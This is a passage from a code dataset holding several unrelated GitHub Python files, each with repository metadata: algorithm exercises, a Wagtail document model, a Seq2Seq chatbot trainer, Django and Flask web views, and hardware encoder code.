길이들을 중복을 제거하여 오름차순으로 나열한다.\n print(len_pb)\n if len(len_pb) == 1:\n return True\n # 만약 len_pb의 길이가 1이라면 phone_book 리스트가 길이가 같은 문자열들로만 이루어졌다는 의미이므로\n # 접두어를 포함하는 번호는 존재할 수 없다.\n else:\n for num in len_pb:\n temp = set([ele[:num] for ele in phone_book if len(ele) > num])\n # phone_book의 원소들 중에서 길이가 num 이상인 원소들을 num 인덱스 이전까지 추출하여 set 자료형으로 변환한다.\n pb = set([ele for ele in phone_book if len(ele) == num])\n # phone_book의 원소들 중 길이가 num인 원소들을 포함한 set 자료형 pb를 만든다.\n if temp & pb:\n # 만약 pb와 temp의 교집합이 공집합이 아니라면 접두어를 포함한 번호가 있다는 의미가 된다.\n return False\n return True\n\nprint()\nprint(solution2([\"119\", \"97674223\", \"1195524421\"]))\nprint(solution2([\"123\",\"456\",\"789\"]))\nprint(solution2([\"10\",\"123\",\"1235\",\"567\",\"88\",'11']))\n\n# 다른사람 풀이\n\ndef solution(phoneBook):\n phoneBook = sorted(phoneBook)\n\n for p1, p2 in zip(phoneBook, phoneBook[1:]):\n if p2.startswith(p1):\n return False\n return True","repo_name":"jinyoong/programers","sub_path":"level2/잔화번호 목록.py","file_name":"잔화번호 목록.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"4646983009","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 13:40:40 2021\n\n@author: John Meluso\n\"\"\"\n\nimport get_data as gd\nimport get_params as gp\nimport math\nimport statistics\nimport numpy as np\nimport scipy.stats\nimport pandas as pd\n\ndef import_execset(execset=1):\n \"\"\"Imports data from a specified execution set and returns a dataframe\n sorted by case number and run number.\"\"\"\n\n # Specify dataframe inputs\n names = ['index_case',\n 'index_run',\n 'x_num_nodes',\n 'x_objective_fn',\n 'x_num_edges',\n 'x_prob_triangle',\n 'x_conv_threshold',\n 'x_max_cycles',\n 'x_init_temp',\n 'x_anneal_iter',\n 'x_est_method',\n 'x_est_prob',\n 'x_anneal_coolrate',\n 'y_num_cycles',\n 'y_sys_perf']\n types = {'index_case': np.int32,\n 'index_run': np.int32,\n 'x_num_nodes': np.int32,\n 'x_objective_fn': 'category',\n 'x_num_edges': np.int32,\n 'x_prob_triangle': np.float64,\n 'x_conv_threshold': np.float64,\n 'x_max_cycles': np.int32,\n 'x_init_temp': np.float64,\n 'x_anneal_iter': np.int32,\n 'x_est_method': 'category',\n 'x_est_prob': np.float64,\n 'x_anneal_coolrate': np.float64,\n 'y_num_cycles': np.int32,\n 'y_sys_perf': np.float64}\n\n # Read from CSV file\n df = pd.read_csv(f'../data/sets/execset{execset:03}_summary.csv',\n names=names, dtype=types)\n\n # Sort the new dataframe by case and run\n df.sort_values(by=['index_case','index_run'],axis=0, inplace=True)\n df.reset_index(drop=True,inplace=True)\n\n # Return the dataframe\n return df\n\n\ndef import_params(exec_list=[1,2,3,4],run_list=np.arange(100)):\n\n params_all = []\n\n # Iterate through executions\n for execnum in exec_list:\n\n # Get parameters for each execution number\n params_subset = gp.get_params(execnum)\n\n for ps in params_subset:\n params_all.append(ps.copy())\n\n return params_all\n\n\nif __name__ == '__main__':\n\n # Import data\n params = import_params()\n\n","repo_name":"meluso/cesium-framework","sub_path":"model/data_import.py","file_name":"data_import.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35326406105","text":"from math import sqrt, pow\n\n\"\"\"TODAS AS MEDIDAS ESTÃO EM cm!!!\"\"\"\n\n\nclass Carteira:\n def __init__(self, raio, x, y):\n self.raio = raio\n self.x = x\n self.y = y\n\n def distancia_carteira(self, pontox, pontoy):\n \"\"\"Essa função é para fazer a distância entre o (x, y) da carteira e os (x, y) das outras carteiras,\n que serão adicionadas conforme o programa roda.\"\"\"\n if sqrt(((pontox - self.x) ** 2) + ((pontoy - self.y) ** 2)) >= (self.raio * 2):\n return True\n else:\n return False\n\n def distancia_paredex(self, altura):\n \"\"\"Essa função é para calcular a distancia entre a parede do eixo X com relação à carteira\"\"\"\n if abs(self.x - altura) >= self.raio:\n return True\n else:\n return False\n\n def distancia_paredey(self, largura):\n \"\"\"Essa função é para calcular a distancia entre a parede do eixo Y com relação à carteira\"\"\"\n if abs(self.y - largura) >= self.raio:\n return True\n else:\n return False\n\n def distancia_total(self, alturatot, larguratot, lista):\n \"\"\"Essa função é para calcular as distancias totais\"\"\"\n if self.distancia_paredex(alturatot):\n if self.distancia_paredey(larguratot):\n if len(lista) != 0:\n for c in lista:\n if self.distancia_carteira(c[0], c[1]):\n return True\n else:\n return True\n else:\n return False\n else:\n return False\n\n\ncarteiras_colocadas = [] # Lista das carteiras\n\nlarg = int(input('Digite a LARGURA da sala (em cm): ')) # Largura da sala\naltu = int(input('Digite a ALTURA da sala (em cm): ')) # Altura da sala\n\ntablado = int(input('Digite o TAMANHO do tablado (em cm): ')) # Tamanho do tablado\naltunova = altu - tablado\n\nraio_carteira = int(input('Digite a DISTÂNCIA entre as carteiras (em cm): ')) # Distancias entre carteira\nraio_carteira /= 2\nesp = int(input('Digite o ESPAÇAMENTO: ')) # Espaçamento (APENAS PARA CÁLCULOS)\n\nfor j in range(0, altunova + esp, esp): # Loop de cada ponto do plano cartesiano\n for i in range(0, larg + esp, esp):\n cart = Carteira(raio_carteira, i, j)\n if cart.distancia_total(altunova, larg, carteiras_colocadas):\n tupla = (i, j)\n carteiras_colocadas.append(tupla)\n else:\n pass\n\nfor indice, ca in enumerate(carteiras_colocadas):\n print(f'Carteira {indice} = {ca}')\n","repo_name":"BerDavoglio/projeto_camaleao","sub_path":"ProjetoCAMALEAO_PyCharm/CAMALEAO_1.py","file_name":"CAMALEAO_1.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20052731231","text":"# # ipAddress = input(\"Please enter your ip address: \")\n# # print(ipAddress.count(\".\"))\n#\n# parrot_list = [\"man_panin\", \"nore more\", \"a stiff\", \"bereft of live\"]\n#\n# for state in parrot_list:\n# print(\"This parrot is \" + state)\n#\n# even = [2, 4, 6, 8]\n# odd = [1, 3, 5, 7, 9]\n#\n# numbers = even + odd\n# print(numbers)\n# #the idea behind sort method or function is the idea behind the sort method\n# #works on the object and doesnot actually create a new object\n# #the method sort actually mutates the objects\n# #numbers.sort()\n# print(numbers)\n# #the method sorted actually returns the new object\n#\n# numbersInOrder = sorted(numbers)\n# if numbers == numbersInOrder:\n# print(\"The lists are equal\")\n# else:\n# print(\"The lists are not equal\")\n#\n# if numbersInOrder == sorted(numbers):\n# print(\"The lists are equal\")\n# else:\n# print(\"The lists are not equal\")\n#\n\nlist_1 = []\nlist_2 = list()\n\nprint(\"List 1 : {}\".format(list_1))\nprint(\"List 2 is {}\".format(list_2))\n\nif list_1 == list_2:\n print(\"The lists are equal\")\n\n\n#All list types in python are iterable\n\nprint(list(\"The lists are equal\"))\n#Nice\neven = [2, 4, 6, 8]\nanother_even = even\nanother_even.sort(reverse=True)\nif even == another_even:\n print(even)\n#both even and another_even refers to the same list and this can actually be confussing\n\nanother_even2=list(even)\nanother_even2.sort()\nif even==another_even2:\n print(\"The lists are equal\")\nelse:\n print(\"The lists are not equal\")\n\nodd = [1, 3, 5, 7, 9]\nnumbers = [even, odd]\n\nfor number_set in numbers:\n print(number_set)\n\n for value in number_set:\n print(value)","repo_name":"MishRanu/udemy-python-masterclass","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"75251464631","text":"import sys\nif sys.platform == 'esp8266' or sys.platform == 'esp32':\n from rotary_irq_esp import RotaryIRQ\nelif sys.platform == 'pyboard':\n from rotary_irq_pyb import RotaryIRQ\nelif sys.platform == 'rp2':\n from rotary_irq_rp2 import RotaryIRQ\nelse:\n print('Warning: The Rotary module has not been tested on this platform')\n\nimport time\n\nencoder_pin_dict = [(28,29),(27,26),(6,7),(22,20),(4,5),(9,8)]\n\nrotary_list = []\nfor x in range(len(encoder_pin_dict)):\n rotary_list.append( \n RotaryIRQ(pin_num_clk=encoder_pin_dict[x][0],\n pin_num_dt=encoder_pin_dict[x][1],\n min_val=0,\n max_val=24,\n reverse=False,\n range_mode=RotaryIRQ.RANGE_UNBOUNDED,\n pull_up=True,\n half_step=True)\n )\nlast_value = [0 for x in range(6)]\n\nwhile True:\n for x in range(6):\n current_val = rotary_list[x].value()\n if current_val > last_value[x]:\n print(x,0)\n elif current_val < last_value[x]:\n print(x,1)\n last_value[x] = current_val\n","repo_name":"hlord2000/RotaryEncoderHorror","sub_path":"Firmware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26376803001","text":"import os.path\nimport urllib\nfrom contextlib import contextmanager\nfrom mimetypes import guess_type\n\nfrom django.conf import settings\nfrom django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.dispatch import Signal\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom taggit.managers import TaggableManager\n\nfrom wagtail.models import CollectionMember, ReferenceIndex\nfrom wagtail.search import index\nfrom wagtail.search.queryset import SearchableQuerySetMixin\nfrom wagtail.utils.file import hash_filelike\n\n\nclass DocumentQuerySet(SearchableQuerySetMixin, models.QuerySet):\n pass\n\n\nclass AbstractDocument(CollectionMember, index.Indexed, models.Model):\n title = models.CharField(max_length=255, verbose_name=_(\"title\"))\n file = models.FileField(upload_to=\"documents\", verbose_name=_(\"file\"))\n created_at = models.DateTimeField(verbose_name=_(\"created at\"), auto_now_add=True)\n uploaded_by_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"uploaded by user\"),\n null=True,\n blank=True,\n editable=False,\n on_delete=models.SET_NULL,\n )\n uploaded_by_user.wagtail_reference_index_ignore = True\n\n tags = TaggableManager(help_text=None, blank=True, verbose_name=_(\"tags\"))\n\n file_size = models.PositiveIntegerField(null=True, editable=False)\n # A SHA-1 hash of the file contents\n file_hash = models.CharField(max_length=40, blank=True, editable=False)\n\n objects = DocumentQuerySet.as_manager()\n\n search_fields = CollectionMember.search_fields + [\n index.SearchField(\"title\", boost=10),\n index.AutocompleteField(\"title\"),\n index.FilterField(\"title\"),\n index.RelatedFields(\n \"tags\",\n [\n index.SearchField(\"name\", boost=10),\n index.AutocompleteField(\"name\"),\n ],\n ),\n index.FilterField(\"uploaded_by_user\"),\n ]\n\n def clean(self):\n \"\"\"\n Checks for WAGTAILDOCS_EXTENSIONS and validates the uploaded file\n based on allowed extensions that were specified.\n Warning : This doesn't always ensure that the uploaded file is valid\n as files can be renamed to have an extension no matter what\n data they contain.\n\n More info : https://docs.djangoproject.com/en/3.1/ref/validators/#fileextensionvalidator\n \"\"\"\n allowed_extensions = getattr(settings, \"WAGTAILDOCS_EXTENSIONS\", None)\n if allowed_extensions:\n validate = FileExtensionValidator(allowed_extensions)\n validate(self.file)\n\n def is_stored_locally(self):\n \"\"\"\n Returns True if the image is hosted on the local filesystem\n \"\"\"\n try:\n self.file.path\n\n return True\n except NotImplementedError:\n return False\n\n @contextmanager\n def open_file(self):\n # Open file if it is closed\n close_file = False\n f = self.file\n\n if f.closed:\n # Reopen the file\n if self.is_stored_locally():\n f.open(\"rb\")\n else:\n # Some external storage backends don't allow reopening\n # the file. Get a fresh file instance. #1397\n storage = self._meta.get_field(\"file\").storage\n f = storage.open(f.name, \"rb\")\n\n close_file = True\n\n # Seek to beginning\n f.seek(0)\n\n try:\n yield f\n finally:\n if close_file:\n f.close()\n\n def get_file_size(self):\n if self.file_size is None:\n try:\n self.file_size = self.file.size\n except Exception: # noqa: BLE001\n # File doesn't exist\n return\n\n self.save(update_fields=[\"file_size\"])\n\n return self.file_size\n\n def _set_file_hash(self):\n with self.open_file() as f:\n self.file_hash = hash_filelike(f)\n\n def get_file_hash(self):\n if self.file_hash == \"\":\n self._set_file_hash()\n self.save(update_fields=[\"file_hash\"])\n\n return self.file_hash\n\n def _set_document_file_metadata(self):\n self.file.open()\n\n # Set new document file size\n self.file_size = self.file.size\n\n # Set new document file hash\n self._set_file_hash()\n self.file.seek(0)\n\n def __str__(self):\n return self.title\n\n @property\n def filename(self):\n return os.path.basename(self.file.name)\n\n @property\n def file_extension(self):\n return os.path.splitext(self.filename)[1][1:]\n\n @property\n def url(self):\n if getattr(settings, \"WAGTAILDOCS_SERVE_METHOD\", None) == \"direct\":\n try:\n return self.file.url\n except NotImplementedError:\n # backend does not provide a url, so fall back on the serve view\n pass\n\n return reverse(\"wagtaildocs_serve\", args=[self.id, self.filename])\n\n def get_usage(self):\n return ReferenceIndex.get_grouped_references_to(self)\n\n @property\n def usage_url(self):\n return reverse(\"wagtaildocs:document_usage\", args=(self.id,))\n\n def is_editable_by_user(self, user):\n from wagtail.documents.permissions import permission_policy\n\n return permission_policy.user_has_permission_for_instance(user, \"change\", self)\n\n @property\n def content_type(self):\n content_types_lookup = getattr(settings, \"WAGTAILDOCS_CONTENT_TYPES\", {})\n return (\n content_types_lookup.get(self.file_extension.lower())\n or guess_type(self.filename)[0]\n or \"application/octet-stream\"\n )\n\n @property\n def content_disposition(self):\n inline_content_types = getattr(\n settings, \"WAGTAILDOCS_INLINE_CONTENT_TYPES\", [\"application/pdf\"]\n )\n if self.content_type in inline_content_types:\n return \"inline\"\n else:\n return \"attachment; filename={0}; filename*=UTF-8''{0}\".format(\n urllib.parse.quote(self.filename)\n )\n\n class Meta:\n abstract = True\n verbose_name = _(\"document\")\n verbose_name_plural = _(\"documents\")\n\n\nclass Document(AbstractDocument):\n admin_form_fields = (\"title\", \"file\", \"collection\", \"tags\")\n\n class Meta(AbstractDocument.Meta):\n permissions = [\n (\"choose_document\", \"Can choose document\"),\n ]\n\n\n# provides args: request\ndocument_served = Signal()\n\n\nclass UploadedDocument(models.Model):\n \"\"\"\n Temporary storage for documents uploaded through the multiple doc uploader, when validation\n rules (e.g. required metadata fields) prevent creating a Document object from the document file\n alone. In this case, the document file is stored against this model, to be turned into a\n Document object once the full form has been filled in.\n \"\"\"\n\n file = models.FileField(upload_to=\"uploaded_documents\", max_length=200)\n uploaded_by_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n verbose_name=_(\"uploaded by user\"),\n null=True,\n blank=True,\n editable=False,\n on_delete=models.SET_NULL,\n )\n uploaded_by_user.wagtail_reference_index_ignore = True\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/documents/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"} +{"seq_id":"72205238393","text":"import re\nfrom datetime import datetime\nimport datetime as dtm\n\n\ndef verificar_usuario(nombre):\n leng = len(nombre) #numero_de_caracteres\n tipo_dato = isinstance(nombre,str)\n is_number = re.search(\"[0-9]\",nombre)\n arroba = False\n if leng > 6:\n arroba = nombre[6] == \"@\"\n first_last = nombre[0] != nombre[-1]\n k = 0\n exist_plus = False\n signo = 0\n\n for i in range(leng):\n caracter = nombre[i]\n if caracter == \"k\":\n k += 1\n if caracter == '+':\n exist_plus = True\n if caracter == '?' or caracter == '=' or caracter == '&':\n signo += 1\n\n if leng == 10 and tipo_dato and arroba and first_last and k <= 3 and exist_plus and signo > 0 and not is_number :\n return True\n else:\n return False\n\n\ndef validate_date(d,m,a):\n today = datetime.today()\n nacimiento = dtm.datetime(a, m, d).strftime('%s')\n unix_act = dtm.datetime(today.year, today.month, today.day).strftime('%s')\n edad = int((int(unix_act) - int(nacimiento))/31556926)\n return edad\n\ndef validate_alias(al):\n long = len(al)\n space = re.search(' ', al)\n if not space and long >= 5:\n return True\n else:\n return False\n\n\n","repo_name":"DavidGarrido/retos","sub_path":"reto_tres/modulos.py","file_name":"modulos.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9093004117","text":"from django.views import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom ...Entities.Product.Customization import Customization\nfrom django import forms\nfrom django.forms.widgets import TextInput\nimport uuid\nfrom ...Entities.Product.Product import Product\nfrom ...Entities.Orders.Order import Order\nfrom ...Entities.Orders.Status import Status\nfrom django.contrib.auth.models import AnonymousUser\nfrom ...Entities.Users.Address import Address\nfrom ...Entities.Dictionary.Address.City import City\nfrom ...Entities.Users.OrderList import OrderList\nfrom ...Entities.Orders.ProductList import ProductList\nfrom django.http import HttpResponse\nfrom .OrderForm import OrderForm\n\nclass CustomizationForm(forms.ModelForm):\n \n class Meta:\n model = Customization\n fields = ['color','topMaterial','bodyMaterial','pickups']\n widgets = {\n 'color':TextInput(attrs={'class':'form-control'}),\n }\n \nclass CustomizationView(View):\n def get(self, request, **kwargs):\n form=CustomizationForm()\n uid = kwargs['pk']\n \n if isinstance(request.user,AnonymousUser)==False:\n user=request.user\n \n address=user.address\n \n if address:\n street=str(address.street)\n zip_code=str(address.zipCode)\n number=str(address.number)\n flatNumber=str(address.flatNumber)\n else:\n street=\"\"\n zip_code=\"\"\n flatNumber=\"\"\n number=\"\"\n intaial_data = {\n 'email':str(user.email), \n 'first_name':str(user.first_name), \n 'last_name':str(user.last_name),\n 'street':street,\n 'zipcode':zip_code,\n 'number':number,\n 'flat_number':flatNumber\n }\n ordeForm=OrderForm(initial=intaial_data)\n else:\n ordeForm=OrderForm()\n\n try:\n product=Product.objects.get(id=uid)\n except Product.DoesNotExist:\n product=None\n \n try:\n cities = City.objects.all()\n except City.DoesNotExist:\n cities=[]\n \n return render(request,\"store/Custumization.html\",{\"Form\":form,\"product\":product,\"cities\":cities,'orderForm':ordeForm,})\n \n def post(self, request, **kwargs):\n uid = kwargs['pk']\n ordeForm=OrderForm(request.POST)\n try:\n product=Product.objects.get(id=uid)\n except Product.DoesNotExist:\n product=None\n if 'addToCart' in request.POST:\n form=CustomizationForm(request.POST)\n if form.is_valid():\n p=form.save()\n w=product\n w.pk=None\n w.customization=p\n w.save()\n return HttpResponseRedirect(w.add_To_Cart()) \n else:\n print(form.errors)\n \n if \"placeOrder\" in request.POST:\n if ordeForm.is_valid():\n form=CustomizationForm(request.POST)\n print(request.POST)\n p=Customization.objects.create(color=request.POST['color'],topMaterial_id=request.POST['topMaterial'],bodyMaterial_id=request.POST['bodyMaterial'],pickups=request.POST['pickups'])\n w=product\n w.pk=None\n w.customization=p\n w.save()\n clenData=ordeForm.cleaned_data\n cityID=request.POST['city']\n try:\n city=City.objects.get(id=cityID)\n except City.DoesNotExist:\n return HttpResponse(\"error\")\n print(\"placeOrder\") \n try:\n status=Status.objects.get(id=1)\n except Status.DoesNotExist:\n return HttpResponse(\"error\")\n addres=Address.objects.create(street=clenData['street'],number=clenData['number'],\n zipCode=clenData['zipcode'],\n flatNumber=clenData['flat_number'],\n city=city)\n \n order=Order.objects.create(name=clenData['first_name'],lastName=clenData['last_name'],email=clenData['email'],phoneNumber=request.POST['phone']\n ,price=product.price,addres=addres,status=status)\n print(request.POST)\n \n \n ProductList.objects.create(order=order,product=w,qunatitii=1) \n \n print('problem1') \n if isinstance(request.user,AnonymousUser)==False:\n OrderList.objects.create(order=order,user=request.user)\n \n return render(request,\"store/Order.html\")","repo_name":"CezaryKretkowski/CanncionesSite","sub_path":"CancionesSite/app/Views/Products/Customization.py","file_name":"Customization.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41776415422","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport yaml\n\nimport numpy as np\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import preprocessing, utils\nfrom tensorflow.keras.utils import plot_model\n\n\ndef tokenize(sentences):\n tokens_list = []\n vocabulary = []\n for sentence in sentences:\n sentence = sentence.lower()\n sentence = re.sub('[^a-zA-Z]', ' ', sentence)\n tokens = sentence.split()\n vocabulary += tokens\n tokens_list.append(tokens)\n return tokens_list, vocabulary\n\n\n\"\"\" Load QA data \"\"\"\ndir_path = 'data'\nfiles_list = os.listdir(dir_path + os.sep)\n\nquestions = list()\nanswers = list()\nfor filepath in files_list:\n stream = open(dir_path + os.sep + filepath, 'rb')\n docs = yaml.safe_load(stream)\n conversations = docs['conversations']\n for con in conversations:\n if len(con) > 2 :\n questions.append(con[0])\n replies = con[1: ]\n ans = ''\n for rep in replies:\n ans += ' ' + rep\n answers.append(ans)\n elif len(con) > 1:\n questions.append(con[0])\n answers.append(con[1])\n\nanswers_with_tags = list()\nfor i in range(len(answers)):\n if type(answers[i]) == str:\n answers_with_tags.append(answers[i])\n else:\n questions.pop(i)\n\nanswers = list()\nfor i in range(len(answers_with_tags)):\n answers.append(' ' + answers_with_tags[i] + ' ')\n\ntokenizer = preprocessing.text.Tokenizer()\ntokenizer.fit_on_texts(questions + answers)\nVOCAB_SIZE = len(tokenizer.word_index) + 1\n#print( 'VOCAB SIZE : {}'.format( VOCAB_SIZE ))\n\n\n\"\"\" Preparing data for Seq2Seq model \"\"\"\nvocab = []\nfor word in tokenizer.word_index:\n vocab.append(word)\n\n\n\"\"\" encoder_input_data \"\"\"\ntokenized_questions = tokenizer.texts_to_sequences(questions)\nmaxlen_questions = max([ len(x) for x in tokenized_questions])\npadded_questions = preprocessing.sequence.pad_sequences(tokenized_questions, maxlen=maxlen_questions, padding='post')\nencoder_input_data = np.array(padded_questions)\nprint(encoder_input_data.shape, maxlen_questions)\n\n\"\"\" decoder_input_data \"\"\"\ntokenized_answers = tokenizer.texts_to_sequences(answers)\nmaxlen_answers = max([len(x) for x in tokenized_answers])\npadded_answers = preprocessing.sequence.pad_sequences(tokenized_answers, maxlen=maxlen_answers, padding='post' )\ndecoder_input_data = np.array(padded_answers)\nprint(decoder_input_data.shape, maxlen_answers)\n\n\"\"\" decoder_output_data \"\"\"\ntokenized_answers = tokenizer.texts_to_sequences(answers)\nfor i in range(len(tokenized_answers)) :\n tokenized_answers[i] = tokenized_answers[i][1:]\npadded_answers = preprocessing.sequence.pad_sequences(tokenized_answers, maxlen=maxlen_answers, padding='post')\nonehot_answers = utils.to_categorical(padded_answers, VOCAB_SIZE)\ndecoder_output_data = np.array(onehot_answers)\nprint(decoder_output_data.shape)\n\n\"\"\" Defining the Encoder-Decoder model \"\"\"\nencoder_inputs = Input(shape=(maxlen_questions, ))\nencoder_embedding = Embedding(VOCAB_SIZE,200 ,mask_zero=True)(encoder_inputs)\nencoder_outputs, state_h, state_c = LSTM(200 ,return_state=True)(encoder_embedding)\nencoder_states = [state_h, state_c]\n\ndecoder_inputs = Input(shape=(maxlen_answers, ))\ndecoder_embedding = Embedding(VOCAB_SIZE, 200, mask_zero=True)(decoder_inputs)\ndecoder_lstm = LSTM(200, return_state=True, return_sequences=True)\ndecoder_outputs , _, _ = decoder_lstm(decoder_embedding, initial_state=encoder_states)\ndecoder_dense = Dense(VOCAB_SIZE, activation='softmax') \noutput = decoder_dense(decoder_outputs)\n\nmodel = Model([encoder_inputs, decoder_inputs], output)\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n\nmodel.summary()\nplot_model(model, to_file='model.png', show_shapes=True)\n\n\n\"\"\" Train and save the model \"\"\"\nmodel.fit([encoder_input_data, decoder_input_data], decoder_output_data, batch_size=50, epochs=500) \nmodel.save('model.h5')\n","repo_name":"joannhsiao/ChatBot","sub_path":"chatbot_seq2seq_lstm.py","file_name":"chatbot_seq2seq_lstm.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70050897274","text":"#!/usr/bin/env python\nfrom peyotl.collections_store import get_empty_collection\nfrom peyotl.collections_store.validation import validate_collection\nfrom peyotl import write_as_json\nimport sys\n\n# Expecting a lot of lines like pg_2359_4962 for 'pg_2359', 'tree4962'\ninp_fn = sys.argv[1]\nwith open(inp_fn, 'rU') as inp:\n lines = []\n for line in inp:\n line = line.strip()\n if (not line) or (line == 'taxonomy'):\n continue\n assert line.endswith('.tre')\n frag = line[:-4]\n s = frag.split('_')\n study_id, tree_frag = '_'.join(s[:-1]), s[-1]\n tree_id = 'tree' + tree_frag\n lines.append((study_id, tree_id))\nc = get_empty_collection()\nd = c['decisions']\nfor pair in lines:\n d.append({'SHA': '',\n 'decision': 'INCLUDED',\n 'name': '',\n 'studyID': pair[0],\n 'treeID': pair[1]\n })\n\nassert not (validate_collection(c)[0])\nwrite_as_json(c, sys.stdout)\n","repo_name":"OpenTreeOfLife/peyotl","sub_path":"extras/tree-list-to-collection.py","file_name":"tree-list-to-collection.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"3308347487","text":"import os\nfrom sqlalchemy.sql.expression import func\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\nrequired_attribute_template = \"A value is required for the attribute \\\"{}\\\".\"\ninteger_expected_template = \"The attribute \\\"{}\\\" must be an integer.\"\ninteger_out_of_range_template = (\n \"The attribute \\\"{}\\\" must be an integer from {} and {}.\")\nlist_expected_template = \"The attribute \\\"{}\\\" must be a list.\"\nobject_expected_template = \"The attribute \\\"{}\\\" must be an object\"\nnot_found_template = (\n \"A resource for the attribute \\\"{}\\\" with the value \\\"{}\\\" was not found.\")\n\n\ndef create_app(test_config=None):\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n @app.route('/categories')\n def retrieve_categories():\n categories = Category.query.all()\n formatted_categories = {\n category.id: category.type\n for category in categories\n }\n\n return jsonify({\n \"success\": True,\n \"categories\": formatted_categories\n })\n\n @app.route('/questions')\n def retrieve_questions():\n page = request.args.get('page', 1, type=int)\n questions_page = Question.query.\\\n order_by(Question.id.asc()).\\\n paginate(page, per_page=QUESTIONS_PER_PAGE)\n total_questions = questions_page.total\n\n formatted_questions = [\n question.format()\n for question in questions_page.items]\n\n current_category = None\n categories = {\n category.id: category.type.lower()\n for category in Category.query.all()}\n\n return jsonify({\n \"success\": True,\n \"questions\": formatted_questions,\n \"total_questions\": total_questions,\n \"categories\": categories,\n \"current_category\": current_category\n })\n\n @app.route('/questions/', methods=['DELETE'])\n def delete_question(question_id):\n question = Question.query.\\\n filter(Question.id == question_id).\\\n one_or_none()\n\n if question is None:\n abort(422)\n\n question.delete()\n return jsonify({\n \"success\": True\n })\n\n def validate_create_question_input(data):\n errors = []\n if \"question\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"question\",\n \"message\": required_attribute_template.format(\"question\")\n })\n\n if \"answer\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"answer\",\n \"message\": required_attribute_template.format(\"answer\")\n })\n\n if \"category\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"category\",\n \"message\": required_attribute_template.format(\"category\")\n })\n elif not is_integer(data[\"category\"]):\n errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"category\",\n \"message\": integer_expected_template.format(\"category\")\n })\n\n if \"difficulty\" not in data:\n errors.append({\n \"type\": \"attribute_required\",\n \"attribute\": \"difficulty\",\n \"message\": required_attribute_template.format(\"difficulty\")\n })\n elif not is_integer(data[\"difficulty\"]):\n errors.append({\n \"type\": \"invalid_type\",\n \"attribute\": \"difficulty\",\n \"message\": integer_expected_template.format(\"difficulty\")\n })\n elif int(data[\"difficulty\"]) < 1 or int(data[\"difficulty\"]) > 5:\n errors.append({\n \"type\": \"number_out_of_range\",\n \"attribute\": \"difficulty\",\n \"message\": (\n integer_out_of_range_template.format(\"difficulty\", 1, 5))\n })\n\n return errors\n\n @app.route(\"/questions\", methods=[\"POST\"])\n def create_question():\n data = request.get_json()\n\n if not data:\n abort(400)\n\n if \"searchTerm\" in data:\n search_term = data.get(\"searchTerm\", \"\")\n questions = Question.query.\\\n filter(\n Question.question.ilike(f\"%{search_term}%\")\n ).\\\n order_by(Question.id.asc()).\\\n all()\n\n formatted_questions = [\n question.format()\n for question in questions\n ]\n\n return jsonify({\n \"success\": True,\n \"questions\": formatted_questions,\n \"total_questions\": len(formatted_questions),\n \"current_category\": None\n })\n else:\n validation_errors = validate_create_question_input(data)\n if validation_errors:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": validation_errors\n }), 400\n\n category_id = data.get(\"category\")\n category = Category.query.\\\n filter(Category.id == category_id).\\\n one_or_none()\n if not category:\n return jsonify({\n \"success\": False,\n \"type\": \"invalid_request_error\",\n \"message\": (\n \"The request could not be processed because\"\n \" of invalid data.\"),\n \"validation_errors\": [\n {\n \"attribute\": \"category\",\n \"type\": \"not_found\",\n \"message\": (\n not_found_template.format(\n \"category\",\n category_id))\n }\n ]\n }), 400\n\n question = Question(\n question=data.get(\"question\"),\n answer=data.get(\"answer\"),\n category=data.get(\"category\"),\n 